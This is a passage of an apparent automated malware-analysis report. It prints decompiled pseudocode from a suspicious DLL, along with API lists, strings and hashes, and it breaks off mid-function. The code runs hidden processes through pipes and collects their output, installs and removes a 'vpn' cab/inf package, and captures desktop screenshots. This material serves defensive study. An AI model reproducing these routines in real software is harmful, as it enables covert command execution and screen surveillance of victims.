												_t112 = WideCharToMultiByte(0xfde9, 0, _t121, _t116, 0, 0, 0, 0);
												if(_t112 != 0) {
													_t82 = _v132 + _t112;
													_v132 = _t82;
													_push(_t82 + 1);
													if(_t90 != 0) {
														_t85 = HeapReAlloc(GetProcessHeap(), 0, _t90, ??);
														if(_t85 != 0) {
															goto L12;
														} else {
															HeapFree(GetProcessHeap(), _t85, _t90);
															_t90 = 0;
															goto L14;
														}
														goto L24;
													} else {
														_t85 = HeapAlloc(GetProcessHeap(), 8, ??);
														L12:
														_t90 = _t85;
														if(_t90 != 0) {
															WideCharToMultiByte(0xfde9, 0, _t121, _t116, _t90 - _t112 + _v132, _t112, 0, 0);
														}
													}
												}
												L14:
												_t111 = _v120;
											}
											HeapFree(GetProcessHeap(), 0, _t121);
										}
									}
									if(GetTickCount() >= _v116 || _t90 == 0) {
										_push(0);
										_push(_v100.hProcess);
										L6ECAC30C();
									} else {
										if(ReadFile(_v128, _t111, 0x400,  &_v136, 0) != 0) {
											continue;
										} else {
										}
									}
									goto L23;
								}
							}
							L23:
							HeapFree(GetProcessHeap(), 0, _t111);
						}
						L24:
						CloseHandle(_v100.hThread);
						CloseHandle(_v100);
						_t110 = _v132;
					}
					CloseHandle(_v128);
					 *_v4 = _t110;
					return _t90;
				}
			}

0x6eca2ed5
0x6eca2ee7
0x6eca2eeb
0x6eca2eed
0x6eca2ef5
0x6eca2ef9
0x6eca2f01
0x6eca2f05
0x6eca2f11
0x6eca3173
0x6eca317c
0x6eca2f17
0x6eca2f19
0x6eca2f1f
0x6eca2f20
0x6eca2f25
0x6eca2f29
0x6eca2f2f
0x6eca2f30
0x6eca2f38
0x6eca2f40
0x6eca2f47
0x6eca2f4e
0x6eca2f71
0x6eca2f84
0x6eca2f88
0x6eca2fa2
0x6eca2fa4
0x6eca2faa
0x6eca2fd0
0x6eca2fda
0x6eca2fe6
0x6eca2ff0
0x6eca2ff0
0x6eca2ff6
0x00000000
0x00000000
0x6eca3000
0x6eca3014
0x6eca3018
0x6eca301e
0x6eca3032
0x6eca3036
0x6eca3050
0x6eca3069
0x6eca306d
0x6eca3073
0x6eca3075
0x6eca307a
0x6eca307d
0x6eca3101
0x6eca3109
0x00000000
0x6eca310b
0x6eca3114
0x6eca311a
0x00000000
0x6eca311a
0x00000000
0x6eca307f
0x6eca3088
0x6eca308e
0x6eca308e
0x6eca3092
0x6eca30ab
0x6eca30ab
0x6eca3092
0x6eca307d
0x6eca30b1
0x6eca30b1
0x6eca30b1
0x6eca30bf
0x6eca30bf
0x6eca3036
0x6eca30cf
0x6eca3122
0x6eca3124
0x6eca3125
0x6eca30d5
0x6eca30ef
0x00000000
0x00000000
0x6eca30f5
0x6eca30ef
0x00000000
0x6eca30cf
0x6eca2ff0
0x6eca312a
0x6eca3134
0x6eca313a
0x6eca3140
0x6eca3145
0x6eca314c
0x6eca314e
0x6eca314e
0x6eca3157
0x6eca3162
0x6eca316b
0x6eca316b

APIs

CreatePipe.KERNEL32 ref: 6ECA2F09
RtlZeroMemory.NTDLL(?,00000044), ref: 6ECA2F20
RtlZeroMemory.NTDLL ref: 6ECA2F4E
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,08000000,00000000,00000000,?,?), ref: 6ECA2F71
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6ECA2F84
GetProcessHeap.KERNEL32(00000008,00000401,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6ECA2F95
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6ECA2F9C
GetTickCount.KERNEL32 ref: 6ECA2FB0
ReadFile.KERNEL32(?,00000000,00000400,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6ECA2FDE
MultiByteToWideChar.KERNEL32(00000001,00000000,00000000,?,00000000,00000000), ref: 6ECA300E
GetProcessHeap.KERNEL32(00000008,00000002,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6ECA3025
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6ECA302C
MultiByteToWideChar.KERNEL32(00000001,00000000,00000000,?,00000000,00000000), ref: 6ECA3048
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6ECA3063
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6ECA3081
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6ECA3088
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 6ECA30AB
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6ECA30B8
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6ECA30BF
GetTickCount.KERNEL32 ref: 6ECA30C5
ReadFile.KERNEL32(?,00000000,00000400,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6ECA30E7
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?), ref: 6ECA30FA
HeapReAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6ECA3101
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6ECA310D
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6ECA3114
NtTerminateProcess.NTDLL(?,00000000), ref: 6ECA3125
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6ECA312D
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6ECA3134
CloseHandle.KERNEL32(00000001,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6ECA3145
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6ECA314C
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6ECA3157

Strings

D, xrefs: 6ECA2F30

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$AllocByteCharCloseHandleMultiWide$Free$CountCreateFileMemoryReadTickZero$PipeTerminate
String ID: D
API String ID: 1574224466-2746444292
Opcode ID: cea1489233ed15195fbfdb460d02549a7374dbfb8aacd9906001b45b04a914e8
Instruction ID: 13df8fc86cdbb0a928cff83d9d2cea09afc0cf63ff638e3e6ebadfcad4970448
Opcode Fuzzy Hash: cea1489233ed15195fbfdb460d02549a7374dbfb8aacd9906001b45b04a914e8
Instruction Fuzzy Hash: 9B715BB1244702ABE7109FA9CD59F5FBBF9EBC9B05F01491CBB4597280EA70D804CB22

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA44D0, Relevance: 47.5, APIs: 15, Strings: 12, Instructions: 202
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E6ECA44D0(void* __ebx, void* __edi) {
				CHAR* _t35;
				int _t36;
				void* _t42;
				int _t46;
				CHAR* _t47;
				void* _t50;
				void* _t55;
				CHAR* _t57;
				void* _t64;
				void* _t65;
				void* _t66;
				CHAR* _t67;
				CHAR* _t69;
				signed int _t70;
				signed int _t74;
				CHAR* _t78;
				void* _t79;
				CHAR* _t82;
				void* _t84;
				CHAR* _t86;
				void* _t87;
				void* _t88;
				void* _t89;
				intOrPtr _t92;
				intOrPtr _t93;
				CHAR* _t94;
				void* _t96;
				void* _t98;
				void* _t99;
				void* _t100;

				_t89 = __edi;
				_t66 = __ebx;
				 *(_t98 + 0xc) = 0;
				if(M6ECB0544 == 0) {
					L23:
					return  *(_t98 + 0xc);
				} else {
					_t35 = M6ECB04CC; // 0xcb2da8
					_t69 = M6ECB04D8; // 0x0
					_t82 = M6ECB04DC; // 0x0
					_t36 = GetPrivateProfileIntA(_t82, _t69, 0, _t35);
					_t93 =  *((intOrPtr*)(_t98 + 0x38));
					if(_t93 != 0 || _t36 != 0) {
						if( *((intOrPtr*)(_t98 + 0x3c)) != 0) {
							goto L7;
						} else {
							_t64 = M6ECB04D8; // 0x0
							_t65 = E6ECA38A0(_t64, 0, 0, 1);
							_t98 = _t98 + 0x10;
							if(_t65 == (0 | _t93 == 0x00000000)) {
								goto L7;
							}
						}
						goto L23;
					} else {
						if( *((intOrPtr*)(_t98 + 0x3c)) != _t36) {
							L7:
							_t96 = HeapAlloc(GetProcessHeap(), 8, 0x800);
							if(_t96 != 0) {
								_push(_t66);
								_push(_t89);
								wsprintfA(_t96, "%s%s%s", "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD", "vpn", ".cab");
								_t7 = _t96 + 0x201; // 0x201
								_t67 = _t7;
								 *((intOrPtr*)(_t98 + 0x50)) = wsprintfA(_t67, "%s%s%c", "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD", "vpn", 0x5c);
								_t42 = E6ECA2DC0(_t96, _t67, 0);
								_t98 = _t98 + 0x34;
								if(_t42 != 0) {
									_t70 = M6ECB04EC; // 0x0
									asm("sbb ecx, ecx");
									wsprintfA(_t96, "%s%d%c", _t67, ( ~_t70 & 0xffffffea) + 0x56, 0x5c);
									_t9 =  &(_t67[0x401]); // 0x602
									_t94 = _t9;
									_t46 = wsprintfA(_t94, "%s%s%s", _t96, "install", ".exe");
									_t99 = _t98 + 0x28;
									_t47 =  &(( &(_t94[1]))[_t46]);
									 *(_t99 + 0x10) = _t47;
									if( *((intOrPtr*)(_t99 + 0x44)) == 0) {
										_t84 = M6ECB04D8; // 0x0
										wsprintfA(_t47, "%s %s", "remove", _t84);
										_t100 = _t99 + 0x10;
									} else {
										_t79 = M6ECB04D8; // 0x0
										wsprintfA(_t47, "%s \"%s%s%s\" %s", "install", _t96, _t79, ".inf", _t79);
										_t100 = _t99 + 0x1c;
									}
									_t74 =  *(_t100 + 0x10);
									_push(_t100 + 0x14);
									_push(0x1e);
									_push(0);
									 *(_t100 + 0x2c) = 0;
									_t50 = E6ECA4230(0, _t94, _t74);
									_t98 = _t100 + 0x18;
									if(_t50 != 0) {
										if(E6ECA4300() != 0) {
											_t88 = M6ECB04D8; // 0x0
											wsprintfA( *(_t98 + 0x10), "%s %s", "restart", _t88);
											_t74 =  *(_t98 + 0x20);
											_push(0);
											_push(0x1e);
											_push(0);
											E6ECA4230(0, _t94, _t74);
											_t98 = _t98 + 0x28;
										}
										_t92 =  *((intOrPtr*)(_t98 + 0x44));
										if(_t92 == 0) {
											_t55 = M6ECB04D8; // 0x0
											E6ECA3700(_t55, 1);
											_t98 = _t98 + 8;
										} else {
											_t87 = M6ECB04D8; // 0x0
											E6ECA38A0(_t87, 0, 0, 0);
											_t98 = _t98 + 0x10;
										}
										if( *((intOrPtr*)(_t98 + 0x14)) == 0) {
											 *_t94 = (_t74 & 0xffffff00 | _t92 != 0x00000000) + 0x30;
											_t94[1] = 0;
											_t86 = M6ECB04CC; // 0xcb2da8
											_t57 = M6ECB04D8; // 0x0
											_t78 = M6ECB04DC; // 0x0
											WritePrivateProfileStringA(_t78, _t57, _t94, _t86);
											 *((intOrPtr*)(_t98 + 0x18)) = 1;
										}
									}
									_push(0x1e);
									_push(_t98 + 0x24);
									 *((short*)( *((intOrPtr*)(_t98 + 0x1c)) + _t67 - 1)) = 0;
									L6ECAC2EE();
									 *((intOrPtr*)(_t98 + 0x28)) = 3;
									 *(_t98 + 0x2c) = _t67;
									 *((short*)(_t98 + 0x34)) = 0x614;
									SHFileOperationA(_t98 + 0x20);
								}
								HeapFree(GetProcessHeap(), 0, _t96);
							}
							goto L23;
						} else {
							return _t36;
						}
					}
				}
			}

0x6eca44d0
0x6eca44d0
0x6eca44db
0x6eca44e3
0x6eca4749
0x6eca4751
0x6eca44e9
0x6eca44e9
0x6eca44ee
0x6eca44f4
0x6eca44ff
0x6eca4505
0x6eca450b
0x6eca4521
0x00000000
0x6eca4523
0x6eca4523
0x6eca452f
0x6eca4536
0x6eca4540
0x00000000
0x00000000
0x6eca4540
0x00000000
0x6eca4511
0x6eca4515
0x6eca4546
0x6eca455b
0x6eca455f
0x6eca456b
0x6eca456c
0x6eca4584
0x6eca4593
0x6eca4593
0x6eca45a5
0x6eca45a9
0x6eca45ae
0x6eca45b3
0x6eca45b9
0x6eca45c1
0x6eca45d3
0x6eca45e0
0x6eca45e0
0x6eca45ec
0x6eca45ee
0x6eca45f6
0x6eca45fa
0x6eca45fe
0x6eca4620
0x6eca4632
0x6eca4634
0x6eca4600
0x6eca4600
0x6eca4619
0x6eca461b
0x6eca461b
0x6eca4637
0x6eca463f
0x6eca4640
0x6eca4642
0x6eca4648
0x6eca4650
0x6eca4655
0x6eca465a
0x6eca4667
0x6eca4669
0x6eca467f
0x6eca4681
0x6eca4685
0x6eca4687
0x6eca4689
0x6eca468f
0x6eca4694
0x6eca4694
0x6eca4697
0x6eca469d
0x6eca46b6
0x6eca46be
0x6eca46c3
0x6eca469f
0x6eca469f
0x6eca46ac
0x6eca46b1
0x6eca46b1
0x6eca46cb
0x6eca46d5
0x6eca46d7
0x6eca46db
0x6eca46e1
0x6eca46e6
0x6eca46f0
0x6eca46f6
0x6eca46f6
0x6eca46cb
0x6eca4702
0x6eca4708
0x6eca4709
0x6eca4710
0x6eca471f
0x6eca4727
0x6eca472b
0x6eca4730
0x6eca4730
0x6eca4740
0x6eca4747
0x00000000
0x6eca451b
0x6eca451b
0x6eca451b
0x6eca4515
0x6eca450b

APIs

GetPrivateProfileIntA.KERNEL32 ref: 6ECA44FF
GetProcessHeap.KERNEL32(00000008,00000800), ref: 6ECA454E
HeapAlloc.KERNEL32(00000000), ref: 6ECA4555
wsprintfA.USER32 ref: 6ECA4584
wsprintfA.USER32 ref: 6ECA459F
wsprintfA.USER32 ref: 6ECA45D3
wsprintfA.USER32 ref: 6ECA45EC
wsprintfA.USER32 ref: 6ECA4619
wsprintfA.USER32 ref: 6ECA4632
wsprintfA.USER32 ref: 6ECA467F
WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000602,00CB2DA8), ref: 6ECA46F0
RtlZeroMemory.NTDLL(?,0000001E), ref: 6ECA4710
SHFileOperationA.SHELL32 ref: 6ECA4730
GetProcessHeap.KERNEL32(00000000,00000000), ref: 6ECA4739
HeapFree.KERNEL32(00000000), ref: 6ECA4740

Strings

restart, xrefs: 6ECA4674
%s%d%c, xrefs: 6ECA45CD
remove, xrefs: 6ECA4627
.exe, xrefs: 6ECA45D5
.cab, xrefs: 6ECA4573
.inf, xrefs: 6ECA4607
%s%s%s, xrefs: 6ECA457E, 6ECA45E6
%s "%s%s%s" %s, xrefs: 6ECA4613
%s %s, xrefs: 6ECA462C, 6ECA4679
install, xrefs: 6ECA45DA, 6ECA460E
vpn, xrefs: 6ECA4578, 6ECA458D
%s%s%c, xrefs: 6ECA4599

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: wsprintf$Heap$PrivateProcessProfile$AllocFileFreeMemoryOperationStringWriteZero
String ID: %s "%s%s%s" %s$%s %s$%s%d%c$%s%s%c$%s%s%s$.cab$.exe$.inf$install$remove$restart$vpn
API String ID: 39017707-2794406546
Opcode ID: 154e2e81f00278b0f83d3ef015a0dfb0227bc31e8db7a8e14516005dcf432ac6
Instruction ID: a5f2ddaeaa61fe8555ed2c00515f5301b2c9fd519caab8675aa79596c800e84a
Opcode Fuzzy Hash: 154e2e81f00278b0f83d3ef015a0dfb0227bc31e8db7a8e14516005dcf432ac6
Instruction Fuzzy Hash: CC61A271504706AFE7149B9CCE86FAB7BB9AF85708F004508FF44AB285FA74A805CF61

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA23B0, Relevance: 47.4, APIs: 21, Strings: 6, Instructions: 164
librarythreadstringCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E6ECA23B0() {
				char _v260;
				char _v268;
				char* _v272;
				struct _SECURITY_ATTRIBUTES* _v276;
				struct _SECURITY_ATTRIBUTES* _v280;
				struct _SECURITY_ATTRIBUTES* _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				void* _v296;
				char _v320;
				struct HINSTANCE__* _v324;
				void _v328;
				struct HINSTANCE__* _v332;
				char _v336;
				long _v340;
				char _v344;
				CHAR* _t42;
				int _t50;
				long _t51;
				char* _t53;
				char* _t54;
				void* _t56;
				intOrPtr _t62;
				void* _t65;
				void* _t73;
				void* _t88;
				signed int _t91;
				void* _t92;
				long _t96;
				void* _t97;

				_v328 = LoadLibraryA("msvcrt.dll");
				_v324 = LoadLibraryA("user32.dll");
				_v332 = LoadLibraryA("shlwapi.dll");
				_t42 = GetCommandLineA();
				_v340 = 0;
				_t88 = E6ECAA3D0(_t42,  &_v340);
				if(_t88 == 0) {
					L24:
					FreeLibrary(_v324);
					FreeLibrary(_v332);
					FreeLibrary(_v328);
					ExitProcess(0);
				}
				if(_v340 <= 1) {
					L23:
					LocalFree(_t88);
					goto L24;
				} else {
					_t91 = 1;
					do {
						_t50 = lstrcmpiA( *(_t88 + _t91 * 4), "-svcr");
						_t51 = _v340;
						if(_t50 != 0) {
							goto L5;
						}
						_t91 = _t91 + 1;
						if(_t91 < _t51) {
							_t53 = StrRChrA( *(_t88 + _t91 * 4), 0, 0x5c);
							if(_t53 == 0) {
								break;
							}
							_t54 =  &(_t53[1]);
							if(_t54 != 0 &&  *_t54 != 0) {
								wsprintfA( &_v268, "%s%s", "pdll", _t54);
								_t56 = OpenEventA(2, 0,  &_v260);
								if(_t56 != 0) {
									CloseHandle(_t56);
									break;
								}
								_t73 = CreateEventA(0, 1, 0,  &_v260);
								_t96 = 0;
								if(_t73 != 0) {
									_push(0x3c);
									_push( &_v320);
									L6ECAC2EE();
									_v344 = 0;
									_t62 = E6ECA2260( *(_t88 + _t91 * 4),  &_v344);
									if(_t62 != 0) {
										_v292 = _t62;
										_v288 = _v344;
										_v284 = 0;
										_v280 = 0;
										_v276 = 0;
										_v272 =  *(_t88 + _t91 * 4);
										_t92 = CreateThread(0, 0, E6ECA2340,  &_v328, 0, 0);
										if(_t92 != 0) {
											_t97 = E6ECA1D00(_v296, _v292, 0,  &_v332);
											if(_v296 != 0) {
												NtTerminateThread(_t92, 0);
												if(_t97 == 0) {
													E6ECA1C00( &_v336);
												}
											}
											CloseHandle(_t92);
											_t96 = 0;
										}
										_t65 = _v296;
										if(_t65 != _t96) {
											VirtualFree(_t65, _t96, 0x8000);
										}
									}
								}
								CloseHandle(_t73);
							}
							break;
						}
						L5:
						_t91 = _t91 + 1;
					} while (_t91 < _t51);
					goto L23;
				}
			}

0x6eca23ca
0x6eca23d5
0x6eca23db
0x6eca23df
0x6eca23eb
0x6eca23f8
0x6eca23ff
0x6eca2589
0x6eca2594
0x6eca259b
0x6eca25a2
0x6eca25a6
0x6eca25a6
0x6eca240c
0x6eca2582
0x6eca2583
0x00000000
0x6eca2412
0x6eca2419
0x6eca2420
0x6eca2429
0x6eca242d
0x6eca2431
0x00000000
0x00000000
0x6eca2433
0x6eca2436
0x6eca244a
0x6eca2452
0x00000000
0x00000000
0x6eca2458
0x6eca2459
0x6eca2478
0x6eca248a
0x6eca2492
0x6eca257b
0x00000000
0x6eca257b
0x6eca24aa
0x6eca24ac
0x6eca24b0
0x6eca24b6
0x6eca24bc
0x6eca24bd
0x6eca24cb
0x6eca24cf
0x6eca24d9
0x6eca24e8
0x6eca24f8
0x6eca24fc
0x6eca2500
0x6eca2504
0x6eca2508
0x6eca2512
0x6eca2516
0x6eca2535
0x6eca2537
0x6eca253c
0x6eca2543
0x6eca254a
0x6eca254f
0x6eca2543
0x6eca2553
0x6eca2559
0x6eca2559
0x6eca255b
0x6eca2561
0x6eca256a
0x6eca256a
0x6eca2561
0x6eca24d9
0x6eca2571
0x6eca2577
0x00000000
0x6eca2459
0x6eca2438
0x6eca2438
0x6eca2439
0x00000000
0x6eca2581

APIs

LoadLibraryA.KERNEL32(msvcrt.dll), ref: 6ECA23C3
LoadLibraryA.KERNEL32(user32.dll), ref: 6ECA23CE
LoadLibraryA.KERNEL32(shlwapi.dll), ref: 6ECA23D9
GetCommandLineA.KERNEL32 ref: 6ECA23DF

Part of subcall function 6ECAA3D0: lstrlenA.KERNEL32(?,?,?,?,00000000,?), ref: 6ECAA3DB
Part of subcall function 6ECAA3D0: LocalAlloc.KERNEL32(00000040,00000004,?,?,?,00000000,?), ref: 6ECAA3F4

lstrcmpiA.KERNEL32(?,-svcr), ref: 6ECA2429
StrRChrA.SHLWAPI(?,00000000,0000005C,?,-svcr), ref: 6ECA244A
wsprintfA.USER32 ref: 6ECA2478
OpenEventA.KERNEL32(00000002,00000000,?), ref: 6ECA248A
CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 6ECA24A4
RtlZeroMemory.NTDLL(?,0000003C), ref: 6ECA24BD
CreateThread.KERNEL32 ref: 6ECA250C
NtTerminateThread.NTDLL ref: 6ECA253C
CloseHandle.KERNEL32(00000000), ref: 6ECA2553
VirtualFree.KERNEL32(?,00000000,00008000), ref: 6ECA256A
CloseHandle.KERNEL32(00000000), ref: 6ECA2571
LocalFree.KERNEL32(00000000), ref: 6ECA2583
FreeLibrary.KERNEL32(?), ref: 6ECA2594
FreeLibrary.KERNEL32(?), ref: 6ECA259B
FreeLibrary.KERNEL32(?), ref: 6ECA25A2
ExitProcess.KERNEL32 ref: 6ECA25A6

Strings

pdll, xrefs: 6ECA2469
msvcrt.dll, xrefs: 6ECA23BE
shlwapi.dll, xrefs: 6ECA23D0
%s%s, xrefs: 6ECA2472
user32.dll, xrefs: 6ECA23C5
-svcr, xrefs: 6ECA2423

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$Free$Load$CloseCreateEventHandleLocalThread$AllocCommandExitLineMemoryOpenProcessTerminateVirtualZerolstrcmpilstrlenwsprintf
String ID: %s%s$-svcr$msvcrt.dll$pdll$shlwapi.dll$user32.dll
API String ID: 4122922002-3260842094
Opcode ID: 94b283628698a5029e3035e6e07a53176c0c7aa4a1c567745a930bf6162707d2
Instruction ID: 47fdb30d1f4e14c4aa3cf70e3ca497e16d856d22b4b230a52357d6c221262965
Opcode Fuzzy Hash: 94b283628698a5029e3035e6e07a53176c0c7aa4a1c567745a930bf6162707d2
Instruction Fuzzy Hash: EE516CB1904316ABD604ABADC958F5BBBE8FB85748F00490DFA5197240F770E9058BA2

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA66E0, Relevance: 34.7, APIs: 23, Instructions: 239
windowCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E6ECA66E0() {
				intOrPtr* _v140;
				void** _v144;
				struct tagRECT _v164;
				long _v168;
				struct HDC__* _v172;
				int _v180;
				int _v184;
				void _v188;
				int _v192;
				int _v196;
				struct tagCURSORINFO _v212;
				struct HDC__* _v216;
				intOrPtr _v224;
				intOrPtr _v228;
				struct HICON__* _v232;
				intOrPtr _v252;
				intOrPtr _v256;
				void* _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				struct HDC__* _v288;
				struct HDC__* _v304;
				long _v308;
				intOrPtr _v316;
				struct HDC__* _v320;
				intOrPtr _v324;
				struct HDC__* _t61;
				struct HDC__* _t62;
				int _t67;
				void* _t70;
				int _t75;
				intOrPtr _t91;
				int _t99;
				long _t101;
				int _t103;
				struct HWND__* _t136;
				void* _t137;
				int _t138;
				struct HDC__* _t139;
				intOrPtr _t140;
				int _t142;
				void* _t144;

				_v168 = 0;
				_t136 = GetDesktopWindow();
				_v164.left = _t136;
				_t61 = GetDC(_t136);
				_t139 = _t61;
				_v172 = _t139;
				if(_t139 != 0) {
					_t62 = CreateCompatibleDC(_t139);
					_v188 = _t62;
					if(_t62 != 0) {
						_push(0x10);
						_push( &(_v164.right));
						L6ECAC2EE();
						GetWindowRect(_t136,  &_v164);
						_t103 = _v164.bottom;
						_t67 = _v164.right;
						_t99 = _t67;
						_t142 = _t103;
						_t137 = CreateCompatibleBitmap(_t139, _t67, _t103);
						_v212.hCursor = _t137;
						if(_t137 != 0) {
							_t70 = SelectObject(_v212.flags, _t137);
							if(_t70 != 0 && _t70 != 0xffffffff && BitBlt(_v216, _v184, _v180, _t99, _t142, _t139, 0, 0, 0x40cc0020) != 0) {
								_push(0x14);
								_push( &(_v212.hCursor));
								L6ECAC2EE();
								_v212.cbSize = 0x14;
								_t75 = GetCursorInfo( &_v212);
								if(_t75 != 0 && _v212.flags == 1) {
									_push(0x14);
									_push( &_v192);
									L6ECAC2EE();
									_t75 = GetIconInfo(_v212.cbSize,  &(_v212.ptScreenPos));
									if(_t75 != 0) {
										_push(0x18);
										_push( &_v180);
										L6ECAC2EE();
										GetObjectA(_v192, 0x18,  &_v188);
										_t75 = DrawIconEx(_v288, _v228 - _v256 + _v256 - _v216, _v224 - _v252 + _v252 - _v212, _v232, _v196, _v192, 0, 0, 3);
									}
								}
								__imp__#12(0, 0);
								_t138 = _t75;
								if(_t138 != 0) {
									_push(_t138);
									_push(_t142);
									_push(_t99);
									_push( &_v264);
									if(E6ECA6480() != 0) {
										_push(0x48);
										_push( &(_v164.right));
										L6ECAC2EE();
										_push(1);
										_push( &_v164);
										_push(_t138);
										if( *((intOrPtr*)( *((intOrPtr*)( *_t138 + 0x30))))() >= 0) {
											_t101 = _v168;
											if(_t101 != 0) {
												_t144 = VirtualAlloc(0, _t101, 0x1000, 4);
												if(_t144 != 0) {
													_push(8);
													_push( &_v264);
													L6ECAC2EE();
													_push(0);
													asm("xorpd xmm0, xmm0");
													asm("movlpd [esp+0x2c], xmm0");
													_push(0);
													_push(_v268);
													_push(_v272);
													_push(_t138);
													if( *((intOrPtr*)( *((intOrPtr*)( *_t138 + 0x14))))() < 0) {
														L24:
														VirtualFree(_t144, 0, 0x8000);
													} else {
														_t140 = 0;
														if(_t101 == 0) {
															L23:
